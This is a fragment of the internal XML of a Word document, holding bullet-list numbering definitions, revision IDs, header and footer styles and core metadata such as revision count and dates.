    <w:lvl w:ilvl="3" w:tplc="8604A80C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4B2AE450">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8C52C274">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="50E017B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="230ABB44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9DA8CF36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1637444981">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1455177245">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="255987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32"/>
    <w:rsid w:val="000A5129"/>
    <w:rsid w:val="001419E9"/>
    <w:rsid w:val="00152B25"/>
    <w:rsid w:val="001A7E27"/>
    <w:rsid w:val="00277CB5"/>
    <w:rsid w:val="002D4E1F"/>
    <w:rsid w:val="00383060"/>
    <w:rsid w:val="0044489C"/>
    <w:rsid w:val="0081741E"/>
    <w:rsid w:val="009556A1"/>
    <w:rsid w:val="00981708"/>
    <w:rsid w:val="009A3E3A"/>
    <w:rsid w:val="00A00449"/>
    <w:rsid w:val="00AA28FA"/>
    <w:rsid w:val="00B357AD"/>
    <w:rsid w:val="00BC2EEE"/>
    <w:rsid w:val="00C007B9"/>
    <w:rsid w:val="00CF4032"/>
    <w:rsid w:val="00E769A8"/>
    <w:rsid w:val="00F7222E"/>
    <w:rsid w:val="00F72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D305"/>
  <w15:docId w15:val="{AFB6A4D8-283D-43AF-B6A5-B912FCAC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56A1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009556A1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009556A1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009556A1"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA28FA"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="common">
    <w:name w:val="common"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00277CB5"/>
    <w:pPr>
      <w:spacing w:after="12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8</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SHARMA</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-25T16:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-11T06:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>